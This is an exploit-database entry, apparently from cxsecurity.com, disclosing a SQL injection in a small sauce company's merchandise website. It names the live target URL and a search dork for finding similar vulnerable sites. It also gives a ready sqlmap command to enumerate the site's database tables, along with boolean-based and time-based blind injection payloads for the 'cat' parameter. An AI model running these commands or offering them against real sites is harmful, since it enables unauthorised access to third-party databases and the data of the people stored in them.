Big Daddy's Sauces SQL Injection

2019.05.19
tr Cerkuday (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Big Daddy's Sauces SQL Injection # Date:18.05.2019 # Dork :intext:"Graphics by Kinkaid" id= # Exploit Author:Cerkuday # Tested on:Windows &Kali Linux #Demo: http://www.bigdaddysassburn.com/merchandise/index.php?cat=10 # Poc: sqlmap -u "http://www.bigdaddysassburn.com/merchandise/index.php?cat=10" --random-agent -D bigdaddy_gkgwcm --tables --- Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=10 AND 6020=6020 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cat=10 AND SLEEP(5) ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top